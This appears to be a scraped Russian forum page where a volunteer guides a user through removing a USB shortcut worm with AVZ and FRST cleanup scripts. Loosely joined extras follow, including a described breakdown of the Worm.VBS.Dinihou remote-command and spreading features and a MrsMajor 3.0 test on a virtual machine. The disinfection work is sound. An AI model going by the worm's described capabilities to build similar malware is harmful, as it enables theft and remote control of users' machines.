Вирус windows services на флешке


Рейтинг 4.61/56:

0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

13.02.2020, 19:02. Показов 12219. Ответов 21


Добрый день, уважаемые программисты и сисадмины.
Вот уже более года мучаюсь от коварного вируса(ов). Дело в том, что после очередного скачивания материалов у друга, посредством внешнего жёсткого диска, занёс вирус на свой компьютер.
У меня ноутбук ASUS K50IN. ОС Windows 7.
С тех пор, при каждом втыкании любой флэшки — она не открывается сразу, а только при клике на её ярлык, который почему то появляется всегда. Также создаётся сама собой папка WindowsServices. А файлы с флэшке переместились в папку «_».
Чем только не чистил компьютер — бесполезно.
Также компьютер всё более виснет, тормозит, даже, порой до нескольких минут.
Помогите пожалуйста.
Спасибо.



0



0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

14.02.2020, 07:49

 [ТС]

Прикрепляю CollectionLog-2020.02.14-07.28.zip к своему сообщению.



0



22347 / 15823 / 3056

Регистрация: 08.10.2012

Сообщений: 64,377

14.02.2020, 10:26

Сообщение было отмечено alexandre1970 как решение

Решение

Здравствуйте!

Внимание! Рекомендации написаны специально для пользователя alexandre1970. Если рекомендации написаны не для вас, не используйте их — это может повредить вашей системе.
Если у вас похожая проблема — создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
________________________________________ ______________

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

  1. Выполните скрипт в AVZ (Файл — Выполнить скрипт):

    Code

    begin
     ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
     ClearQuarantineEx(true);
     QuarantineFile('C:\Users\Домашний\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk', '');
     QuarantineFile('C:\Users\Домашний\AppData\Roaming\WindowsServices\helper.vbs', '');
     DeleteFile('C:\Users\Домашний\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk');
     DeleteFile('C:\Users\Домашний\AppData\Roaming\WindowsServices\helper.vbs', '32');
     RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Домашний^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^helper.lnk', 'x32');
    BC_ImportALL;
    ExecuteSysClean;
     ExecuteWizard('SCU', 2, 3, true);
    BC_Activate;
    RebootWindows(true);
    end.

    Компьютер перезагрузится.

    После перезагрузки, выполните такой скрипт:

    Code

    begin
     DeleteFile(GetAVZDirectory+'quarantine.7z');
     ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
    end.
  2. Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.
    К сообщению прикреплять файл quarantine.7z не нужно!
  3. Подготовьте новый CollectionLog. В первом диалоговом окне нажмите «ОК», удерживая нажатой клавишу «Shift».



1



0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

14.02.2020, 11:58

 [ТС]

Спасибо Вам.
Всё сделал. После выполнения 1-го скрипта — компьютер не перезагрузился. Отказался перезагружаться и выключаться в принципе. Пришлось выключить насильно и включить.



0



22347 / 15823 / 3056

Регистрация: 08.10.2012

Сообщений: 64,377

14.02.2020, 13:15

Сообщение было отмечено alexandre1970 как решение

Решение

Флешки теперь должны работать нормально. Видны следы адвари, почистим:
Подготовьте и прикрепите лог сканирования AdwCleaner.



1



0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

14.02.2020, 14:13

 [ТС]

Благодарю за действенную помощь. Действительно, помогли. Хотя ярлык с флэшки не удалился, при удалении ярлыка вручную, а также новых папок, созданных вирусом — при повторном втыкании флэшки всё показывает как раньше, правильно, как и должно быть. Эта флэшка была подключённой во время совершения мной всех операций по Вашим указаниям.
Только при подключении других флэшек — остаётся папка (тайная) «System Volume Information». Удалить её не получается.
Внутри папки файл «IndexerVolumeGuid». Файл странный. При попытки удалить — не удаляется. При попытке изменить расширение его — тут же исчезает. При повторном открытии папки — он снова на месте.



0



22347 / 15823 / 3056

Регистрация: 08.10.2012

Сообщений: 64,377

14.02.2020, 14:33

Сообщение было отмечено alexandre1970 как решение

Решение

Сообщение от alexandre1970

остаётся папка (тайная) «System Volume Information»

Только не тайная, а скрытая
Это нормальное поведение, удалять не нужно.

1.

  • Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
  • В меню Параметры включите дополнительно в разделе Действия по базовому восстановлению:
    • Сбросить политики IE
    • Сбросить политики Chrome
  • В меню Информационная панель нажмите Сканировать.
  • По окончании нажмите кнопку Карантин и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x — любая цифра).
  • Прикрепите отчет к своему следующему сообщению.
  • (Обратите внимание — C и S — это разные буквы).

Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

2.
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте).
Подробнее читайте в этом руководстве.



1



0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

14.02.2020, 14:56

 [ТС]

Благодарю Вас.
Всё сделал.



0



22347 / 15823 / 3056

Регистрация: 08.10.2012

Сообщений: 64,377

14.02.2020, 15:04

Сообщение от Sandor

будут созданы отчеты FRST.txt и Addition.txt

Этих пока нет.



1



0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

14.02.2020, 15:09

 [ТС]

ПОнял, извините, ошибся.



0



0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

14.02.2020, 15:12

 [ТС]

Понял Вас.



0



Sandor

22347 / 15823 / 3056

Регистрация: 08.10.2012

Сообщений: 64,377

14.02.2020, 15:31

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Code
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    
    Start::
    CreateRestorePoint:
    GroupPolicy: Restriction ? <==== ATTENTION
    Toolbar: HKU\S-1-5-21-715022274-1484850467-3942142927-1000 -> No Name - {EF293C5A-9F37-49FD-91C4-2B867063FC54} -  No File
    C:\Users\Домашний\AppData\Local\Google\Chrome\User Data\Default\Extensions\gehngeifmelphpllncobkmimphfkckne
    C:\Users\Домашний\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gehngeifmelphpllncobkmimphfkckne
    2017-12-26 14:21 - 2017-12-26 14:21 - 000000764 _____ () C:\Users\Домашний\AppData\Local\uBar.lnk
    FirewallRules: [TCP Query User{58675617-3BDE-4182-A927-5467FE63CDF0}C:\users\домашний\appdata\local\mediaget2\mediaget.exe] => (Block) C:\users\домашний\appdata\local\mediaget2\mediaget.exe No File
    FirewallRules: [UDP Query User{931349F7-582F-4EB7-9C9E-5C2889624433}C:\users\домашний\appdata\local\mediaget2\mediaget.exe] => (Block) C:\users\домашний\appdata\local\mediaget2\mediaget.exe No File
    FirewallRules: [{919700C6-365B-4563-BDAB-4E0033799131}] => (Allow) C:\Users\Домашний\AppData\Local\Temp\Torrent2Exe\T2E.exe No File
    FirewallRules: [{D0210616-671C-4680-BEBB-3A734BBEADEC}] => (Allow) C:\Users\Домашний\AppData\Local\Temp\Torrent2Exe\T2E.exe No File
    FirewallRules: [{31DB5CE6-3512-4606-B5D3-E501F9FF3686}] => (Allow) C:\Users\Домашний\AppData\Local\MediaGet2\mediaget.exe No File
    FirewallRules: [{B562273A-FF61-47EC-86BC-530D92580539}] => (Allow) C:\Users\Домашний\AppData\Local\MediaGet2\mediaget.exe No File
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой — Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.



1



0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

14.02.2020, 17:02

 [ТС]

Да, хорошо, всё сделал.
Компьютер перезагрузился.
Браузер гуглхром закрыл все вкладки. Но это ничего. Вкладки заново восстановлю, пароли к страницам тоже.



0



22347 / 15823 / 3056

Регистрация: 08.10.2012

Сообщений: 64,377

14.02.2020, 22:30

Сообщение от alexandre1970

Браузер гуглхром закрыл все вкладки

Была глубокая очистка временных файлов:

EmptyTemp: => 4.5 GB temporary data Removed.

Завершаем:
1.

  • Пожалуйста, запустите adwcleaner.exe
  • В меню Настройки — Удалить AdwCleaner — выберите Удалить.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

2.

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.



1



0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

16.02.2020, 09:10

 [ТС]

Благодарю Вас. Всё сделал.



0



22347 / 15823 / 3056

Регистрация: 08.10.2012

Сообщений: 64,377

16.02.2020, 19:11

——————————- [ Windows ] ——————————-
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
————————— [ OtherUtilities ] —————————-
Microsoft Office Visio Профессиональный 2007 v.12.0.4518.1014 Данная программа больше не поддерживается разработчиком.
Microsoft Office Visio Professional 2007 v.12.0.4518.1014 Данная программа больше не поддерживается разработчиком.
Microsoft Office Word Viewer 2003 v.11.0.8173.0 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
——————————— [ Arch ] ———————————
Архиватор WinRAR Данная версия программы больше не поддерживается разработчиком.. Удалите старую версию, скачайте и установите новую.
——————————— [ P2P ] ———————————
µTorrent v.3.5.5.45231 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.
——————————— [ Java ] ———————————
Java 8 Update 161 v.8.0.1610.12 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u241-windows-i586.exe)^
Java(TM) 6 Update 32 v.6.0.320 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE 8 (jre-8u241-windows-i586.exe).
————————— [ AppleProduction ] —————————
iTunes v.12.9.3.3 Внимание! Скачать обновления
^Для проверки новой версии используйте приложение Apple Software Update^
QuickTime 7 v.7.79.80.95 Данная программа больше не поддерживается разработчиком и имеет известные проблемы безопасности! Рекомендуется деинсталлировать данное ПО.
————————— [ AdobeProduction ] —————————
Adobe Flash Player 10 Plugin v.10.0.22.87 Внимание! Скачать обновления
—————————- [ UnwantedApps ] ——————————
UmmyVideoDownloader v.1.8.2.0 Внимание! Подозрение на Adware! Если данная программа Вам неизвестна, рекомендуется ее деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware и Malwarebytes AdwCleaner Перед деинсталляцией и сканированием обязательно проконсультируйтесь в теме форума, где Вам оказывается помощь!!!

Читайте http://www.cyberforum.ru/virus… 30326.html



1



0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

18.02.2020, 15:30

 [ТС]

Добрый день.
Благодарю Вас за оказанную помощь.
Всё постарался сделать последовательно, как Вы написали.
Флэшки работают исправно.
Но, после установки Malwarebytes Anti-Malware и Malwarebytes AdwCleaner и сканирования — компьютер перезагрузился. Далее — в работе начал сильно зависать. Работать стало невозможно. Перезагрузил. Но ещё подтормаживает не слабо порой.
буду благодарен за рекомендации.



0



22347 / 15823 / 3056

Регистрация: 08.10.2012

Сообщений: 64,377

18.02.2020, 15:46

Сообщение от Sandor

Перед деинсталляцией и сканированием обязательно проконсультируйтесь в теме форума

А почему же не проконсультировались?

Сообщение от alexandre1970

Malwarebytes Anti-Malware

Деинсталлируйте через Панель управления.

Сообщение от alexandre1970

AdwCleaner

Удалите по инструкции п.1 сообщения №14.

Если «тормоза» продолжаются, проверьте в безопасном режиме и сообщите.



1



0 / 0 / 0

Регистрация: 13.02.2020

Сообщений: 23

19.02.2020, 13:24

 [ТС]

Добрый день. Благодарю Вас за Ваше участие и конкретную помощь.
Деинсталировал Malwarebytes Anti-Malware.
Подскажите пожалуйста, как выполнить задание:
Удалите по инструкции п.1 сообщения №14.
1.
Пожалуйста, запустите adwcleaner.exe
В меню Настройки — Удалить AdwCleaner — выберите Удалить.

Где это «Меню» и «настройки»? Спасибо.

Ещё. Продолжает иногда зависать браузер Google Ghrome.
Перезапустил компьютер в «Защищённом режиме». Всё вроде бы работает без зависания. Но не проверить браузер, т.к. интернет при этом не подключается.



0



22347 / 15823 / 3056

Регистрация: 08.10.2012

Сообщений: 64,377

19.02.2020, 13:31

Сообщение от alexandre1970

Где это «Меню» и «настройки»? Спасибо.

Спасибо за уточнение (поменяю свой шаблон), не «Настройки», а «Параметры»

Сообщение от alexandre1970

Продолжает иногда зависать браузер Google Ghrome

Сделайте Сброс настроек браузера Chrome.
Понаблюдайте и сообщите результат.



1



Новые блоги и статьи

Все статьи  

Все блоги / 

Трансферное обучение с предобученными моделями в Keras с Python

AI_Generated 06.05.2025

Суть трансферного обучения проста: взять модель, которая уже научилась решать одну задачу, и адаптировать её для решения другой, похожей задачи. Мозг человека работает по схожему принципу. Изучив. . .

Циклические зависимости в C#: методы управления и устранения

stackOverflow 06.05.2025

Если вы хоть раз работали над не самым тривиальным проектом на C#, то наверняка сталкивались с той ситуацией, когда компилятор вдруг начинает сыпать странными ошибками о невозможности разрешить. . .

Как перейти от Waterfall к Agile

EggHead 06.05.2025

Каскадная модель разработки Waterfall — классический пример того, как благие намерения превращаются в организационный кошмар. Изначально созданная для упорядочивания хаоса и внесения предсказуемости. . .

Оптимизация SQL запросов — Продвинутые техники

Codd 06.05.2025

Интересно наблюдать эволюцию подходов к оптимизации. Двадцать лет назад всё сводилось к нескольким простым правилам: «Избегайте SELECT *», «Используйте индексы», «Не джойните слишком много таблиц». . . .

Создание микросервисов с gRPC и Protobuf в C++

bytestream 06.05.2025

Монолитные приложения, которые ещё недавно считались стандартом индустрии, уступают место микросервисной архитектуре — подходу, при котором система разбивается на небольшие автономные сервисы, каждый. . .

Многопоточность и параллелизм в Python: потоки, процессы и гринлеты

py-thonny 06.05.2025

Параллелизм и конкурентность — две стороны многопоточной медали, которые постоянно путают даже бывалые разработчики.

Конкурентность (concurrency) — это когда ваша программа умеет жонглировать. . .

Распределенное обучение с TensorFlow и Python

AI_Generated 05.05.2025

В машинном обучении размер имеет значение. С ростом сложности моделей и объема данных одиночный процессор или даже мощная видеокарта уже не справляются с задачей обучения за разумное время. Когда. . .

CRUD API на C# и GraphQL

stackOverflow 05.05.2025

В бэкенд-разработке постоянно возникают новые технологии, призванные решить актуальные проблемы и упростить жизнь программистам. Одной из таких технологий стал GraphQL — язык запросов для API,. . .

Распознавание голоса и речи на C#

UnmanagedCoder 05.05.2025

Интеграция голосового управления в приложения на C# стала намного доступнее благодаря развитию специализированных библиотек и API. При этом многие разработчики до сих пор считают голосовое управление. . .

Реализация своих итераторов в C++

NullReferenced 05.05.2025

Итераторы в C++ — это абстракция, которая связывает весь экосистему Стандартной Библиотеки Шаблонов (STL) в единое целое, позволяя алгоритмам работать с разнородными структурами данных без знания их. . .

Наверх

3 месяца). Сегодня, когда активировал пробную версию антивируса и обновив его, провел проверку ноутбука и флешки на наличие вирусов. Антивирус удалил с флешки следующие файлы «helper.vbs», «installer.vbs», «movemenoreg.vbs». С ноута антивирус тоже вроде эти файлы удалил, я закрыл лог сканирования ноута в антивирусе, поэтому точно не помню. После удаления антивирусом этих файлов, ярлык в корне флешки не открывает скрытую папку. Пробовал скопировать файлы с флешки и отформатировать флешку. После форматирования ярлык не создается, но если вытащить и вставить флешку обратно, то ярлык создается, но не открывает скрытую папку с файлами.

01.10.2019, 21:44

Вирус создает на флешке ярлык на скрытую папку на флешке
Доброго времени суток. Словил вирус на флэшку,который создает скрытую папку на флешке с названием.

Вирус, который создает на флешке скрытую папку под названием 5f5f5
Появился у меня вирус, который создает на флешке скрытую папку под названием 5f5f5. Кто знает, что.

Вирус создаёт ярлык на флешке на невидимую системную папку где находятся все файлы
Я пытался сам от него избавиться. удалял все системные файлы в флешке, надеясь что один из них.

Вирус создает ярлык на флешке
После подключения флешек к моему компьютеру, в корне флешки создается ярлык на скрытую папку, в.

02.10.2019, 08:26 2

Решение

Внимание! Рекомендации написаны специально для пользователя Михаил О. Если рекомендации написаны не для вас, не используйте их — это может повредить вашей системе.
Если у вас похожая проблема — создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
______________________________________________________

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте).
Подробнее читайте в этом руководстве.

02.10.2019, 17:10 [ТС] 3

03.10.2019, 08:47 4

Решение

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:

03.10.2019, 14:00 [ТС] 5

03.10.2019, 16:06 6
06.10.2019, 22:33 [ТС] 7

07.10.2019, 08:25 8

Решение

08.10.2019, 08:42 [ТС] 9

08.10.2019, 11:30 10

Проделайте завершающие шаги:
1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

Заработок, финансы, создание и продвижение сайтов

  • Вирус создал ярлык флешки на флешке 314 просмотров
  • Наборщик текста страховой взнос 85 просмотров
  • ТОП популярных хэштегов ВКонтакте 65 просмотров
  • Шрифт как ВКонтакте на фото 62 просмотра
  • Развод с QIWI кошельком 56 просмотров
  • Samsung Galaxy S8 скидка 80 % 52 просмотра
  • Развод копия Galaxy S8 46 просмотров
  • Развод сборка ручек на дому 39 просмотров
  • Как восстановить удаленную страницу ВКонтакте 39 просмотров
  • Сообщество было заблокировано за резкую смену тематики 28 просмотров

Имел неосторожность воткнуть свою флешку в компьютер коллективного пользования, и тут же получил подарок в виде вируса. И это несмотря на установленный на нем антивирус Касперского. При попытке зайти на флешку, в корневом каталоге обнаружил ярлык флешки. Все остальные файлы и папки исчезли.

Вначале я не на шутку распереживался, поскольку на флешке были важные данные, а бэкап я делал уже довольно давно. Но все таки — это была не физическая смерть данных. Флешка оставалась заполненной, прекрасно открывалась и я понял что смогу решить проблему.

Как исправить ситуацию

Решения проблемы необходимо разделить на два пункта. Первое — это возвращение вместо ярлыка, на флешку, всех файлов и папок целыми и невредимыми. И второе — это удаление вируса и предотвращение его дальнейшего распространения.

Вернуть файлы на флешку

Как исправить ситуацию и вернуть все файлы и папки на флешку? На самом деле все очень просто. Необходимо вставить флешку в компьютер, вызвать командную строку, прописать следующие команды:

cd /d X: (вместо Х вы вводите букву каталога вашей флешки)

attrib -s -h -a -r /s /d *.* (прописываете точно как указано)

Для автоматизации процесса я сделал небольшой батник (файл .bat) который можно просто скопировать на флешку и запустить. Он выполняет указанную выше команду, просто её не будет нужно прописывать в командной строке.

Ну и может быть он пригодится тем, у кого заражена целая сеть и много людей обращаются с проблемой ярлыка флешки на флешке. Иногда легче дать людям батник и показать как он работает, чем по 20 раз возвращать флешку к жизни самому.

Удалить вирус

Осталось дело за малым, удалить вирус с компьютера, чтобы остановить дальнейшее распространение.

Для этого скачиваем программу Process Explorer от Майкрософт с официального сайта.

Process Explorer v16.20

Далее её разумется запускаем и выбираем в выпадающем меню File / Show Details for All Processes для того чтобы отобразить все запущенные на компьютере процессы.

Жмем Ctrl + L и в окне в нижней части программы ищем процесс autorun.inf Вероятнее всего он будет находиться в ветке svchost.exe .

Жмем правой кнопкой мыши и выбираем Close handle (закрываем процесс). После чего удаляме с флешки файл autofun.inf .

Во временной папке Temp ( C:\users\%username%\AppData\Local\Temp ) ищем файл с необычным расширением .pif и удаляем его (можно воспользоваться поиском).

Всё, теперь вы точно удалили вирус и с флешки и с компьютера.

Winset

Вынесу из комментариев алгоритм действий в случае, если на флешке находится скрытая папка Winset.

71 комментарий

У меня нет на флешке файла autofun.inf. И при поиске в программе Process Explorer у меня нет файла autorun. Но все флешки заражаются от моего ноутбука. Помогите, пожалуйста.

Переустановка системы однозначно решит проблему с вирусом, проникшим в систему. Но сам файл, из которого вирус проник в систему может быть скрыт в любом файле на любом диске вашего компьютера. После переустановки системы удалите все подозрительные приложения, игры и файлы со своего компьютера.

У меня тоже самое. Что делать?

Спасибо за помощь. Удалось вернуть файлы в нормальное видимое состояние.

Благодарю за отзыв, рад что смог помочь

Столкнулся с такой проблемой — флешка заразила два ноутбука и ещё три флешки. Помог антивирус Касперского ( другие ничего не показывали Dr WEB и Avast и USB guard) Касперский определил путь — C:\Users\Дмитрий\AppData\Roaming\Winset\ Но сначала надо на панели управления — свойства папки — вид-поставить точку — показывать скрытые папки и файлы, тем самым увидеть папку AppData. В папке Winset три файла — они постоянно прописываются на флешке при открытии. В итоге я удалил папку Winset, перезагрузил компьютер — и отформатировал флешку при подключении и всё.

Когда я словил вирус, Касперский его еще не обнаруживал.

Подскажите, пожалуйста, если Process Explorer не обнаруживает процесс autofun.inf, то это значит, что его действительно не существует, компьютер чист и вирус я подхватила с другого компьютера? Папка Temp тоже отсутствует.

Да, вероятнее всего так и есть. Вспоминайте куда флешку втыкали, вот тот то комп и надо чистить.

Всем привет !
[bimg=25%|fright]http://safezone.cc/attachments/cherv-jpg.21405/?temp_hash=e65dcf6b9a7e2d9eb43416bd87d5e7d2[/bimg]
В сегодняшнем меню будет подан на растерзание Worm.VBS.Dinihou.dt (по классификации Kasperky) с компонентами Worm:VBS/Jenxcus.

Целевое назначение: клиент, выполняющий различные команды с удаленного сервера.

Расшифровка скрипта после запуска происходит не сразу, а через 5 минут (возможно, защита от поведенческого анализа).

Устанавливает соединение с сервером по специальному порту и передает в качестве user-агента информацию о системе:
— серийные номера дисков;
— имя компьютера и пользователя;
— версия ОС;
— имена антивирусов;
— запущен ли червяк со съемного диска (проверка любопытная: расположен ли скрипт в корне диска).

После чего он превращается по сути в сервер, запрашивая каждые 5 секунд такие команды на исполнение:
[bimg=09%|fright]http://safezone.cc/attachments/serv_comm-png.21408/?temp_hash=e65dcf6b9a7e2d9eb43416bd87d5e7d2[/bimg]
— открыть / выполнить файл (программу);
— обновление тела скрипта и его перезапуск;
— удаление скрипта с исправлением последствий его работы (если не учитывать команды с сервера);
— выгрузка произвольного файла;
— скачивание файла и затем его запуск (с произвольного адреса или сервера злоумышленника по указанному порту);
— перечисление дисков и их типов;
— листинг файлов и папок в указанной директории (с отображением их атрибутов и размера);
— список процессов (имя, ProcessID, полный путь к образу);
— выполнить консольную команду или файл с отправкой на сервер результата вывода консоли;
— удалить файл или папку;
— завершить процесс принудительно с всеми дочерними экземплярами;
— заснуть на N секунд.

Выполнение каждой команды сопровождается повторной отправкой информации о системе (данные генерируются только один раз за работу скрипта).
К моменту тестирования командный сервер уже был неактивен.

1) Автозапуск:
Помещает свою копию:
— в папку «%programdata%» (или «%temp%», если первая не существует), которую прописывает в ключи автозапуска.
— в папку «Автозагрузка».

2) Самовосстанавливление:
Восстанавливает тело, если удалить скрипт, не завершив процесс.
Есть защита от одновременного запуска из нескольких папок (именно папок, а не экземпляров процесса).
По причине ошибки реализации, после перезагрузки работают одновременно 2 экземпляра процесса.

Если подключен съемный накопитель, копирует себя в его корень.
Для каждого файла или папки первого уровня (на выбор)* создается ярлык, маскируя свою иконку под изображение соответствующего типа файла, взятого из реестра.
Настоящим файлам/папкам присваивает атрибут скрытый и системный.
При клике по такому ярлыку сначала запускается вредоносный скрипт и за ним сразу же оригинальный файл.
Все происходит в свернутом режиме, поэтому пользователь может не сразу заметить подмены.
Разницу можно увидеть только по наличию стрелочки на пиктограмме иконки
Это говорит о том, что файл является ярлыком (кстати, это не есть 100% гарантия, т.к. стрелочку можно замаскировать).

* Мне в руки попал скрипт, у которого отключено создание ярлыков. Остался только сам код, но есть переключатель в шапке кода.
Т.к. предусмотрено автообновление тела скрипта, автор может быстро изменять его поведение.

Здесь у автора своеобразный почерк. Обычно в поле объект ярлыка путь прописывают в кавычках вида:

Часто автора таких творений оставляют особый маркер, который проверяется.
И если он есть, то скрипт не делает ничего плохого.
Может, это защита вирусописателей самих от себя

Этот скрипт использует интересную проверку:
— если нельзя изменить его тело (в папке %programdata%), например поставив галку «Только для чтения»,
то будет записано в реестр время запуска* и более никаких вредоносных действий не произойдет.

* При каждом запуске скрипт записывает свое имя файла, дату запуска, а также запущен ли он с флеш-носителя,
в раздел реестра: HKEY_LOCAL_MACHINE\software\

Функция удаления:
Червь имеет функцию самоуничтожения, если такая команда поступит с сервера:
— удаляются сами файлы скрипта;
— удаляется запись об автозагрузке.
В дополнение:
— удаляются ярлыки со съемных накопителей;
— снимаются все атрибуты с файлов и каталогов в корне съмного накопителя.

Поскольку вирус распространяется через съемные накопители,
рекомендую запретить запуск исполняемых файлов с таких носителей, настроив групповые политики*:
— войдите в редактор групповых политик (Нажимаем комбинацию клавиш Win + R, затем вводим gpedit.msc)
— пройдемся по дереву -> Конфигурация компьютера -> Параметры безопасности -> Политика ограниченного использования программ
— Действие -> «Создать политику»
— Дополнительные правила -> Нажимаем «Действие» -> Создать правило для пути -> Путь указываем, например: F:\
где F — буква флеш-накопителя; Уровень безопасности -> выбираем «Запрещено».
Желательно проделать тоже самое с другими буквами дисков (кроме логических), с которыми может быть ассоциирован новый флеш-накопитель.

* Групповые политики недоступны для Home-редакций ОС. Для таких систем в качестве превентивной меры Вы также можете:
1) Запретить автозапуск, запустив через консоль (Win + R, ввести CMD), введя команду:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 221 /f

Рекомендации по удалению вируса:

1. Разорвать подключение к интернету.
2. Отключить автозапуск со съемных накопителей.
3. Подключить зараженный съемный носитель.
4. Открыть диспетчер задач (Ctrl + Shift + Esc), перейти во вкладку «Процессы» и завершить все процессы с именами wscript.exe и cscript.exe
Это остановит выполнение полученных от сервера команд.
5. Загрузить Sysinternals Autoruns. Снять галочку с записей, которые запускают процесс wscript.exe / cscript.exe / cmd.exe или файлы скриптов .VBS
6. Запустить командную строку (Win + R, ввести CMD), ввести команду, подтвердив кнопкой ENTER:

где F — нужно поменять на букву диска съемного накопителя.
7. Откройте флешку и удалите все ярлыки (у них на пиктограмме будет отображатся знак стрелочки).
Для удобства отсортируйте файлы по признаку «Тип»: Вид -> Таблица, нажмите на название колонки «Тип».
8. Обратиться в раздел помощи в профессиональном лечении системы от вирусов*.

* Этот червь может выполнять команды с сервера на любой вкус, поэтому заранее неизвестно, какой вред он причинил.

Статья о страшном вирусе MrsMajor2.0, второй версии, которая была написана еще в 2018 году, как ни странно была и остаётся популярной. Не так давно, появилась уже третья версия этого файла, а также запросы, которые поступают в Метрику дают об этом понять, насколько многих это интересует.

MrsMajor 3.0 это вирус с графическим интерфейсом, который одновременно и жуткий и интересный. Сегодня, как раз рассмотрим 3 версию этого вируса, которая может удивить не меньше, чем предыдущая. И как итог, попробуем запустить на виртуальной машине данный вирус, и понять, как он работает, и как от него мы сможем защититься.

Запуск

На нашем рабочем столе находится архив под названием MrsMajor_3.0.rar, который мы разархивируем. Внутри имеем всего один файл MrsMajor 3.0.exe, весом в 382 КБ. В этот раз нас встречает ярлык в виде необычной матрёшки, с привычными вирусу цветами красный и чёрный.

Здесь простая информация о том, чтобы мы в поиске Google не искали связанное с антивирусами, и о том, что если загуглить у Вас появится синий экран смерти.

В целом эти правила можно не успеть дочитать, так как Ваш ПК начнёт перезагрузку. Кстати перед перезагрузкой было заметно создание файла ReadMe (MrsMajor 3.0).txt на рабочем столе с ярлыком глаза, и весом в 606 байт.

После перезагрузки

Откроем тот самый файл ReadMe (MrsMajor 3.0).txt, хотя читать конечно уже не так легко, через кровавый экран. При этом мы пока не будем пытаться избавиться от этого вируса, и посмотрим, что будет дальше.

Прошло 2 минуты, и в целом забавно то, что данная версия вируса заливает весь экран красными красками, в итоге использовать какое-то ПО становится сложнее.

Кстати, подождав пока уровень крови закончится нам выскакивает синий экран смерти. И даже если система выполнила восстановление, то всё равно уходит в синий экран.

Лечение MrsMajor 3.0

Если проделать тоже самое с taskmgr.exe (диспетчером задач), переместить на рабочий стол и переименовать, то выдаёт ошибку.

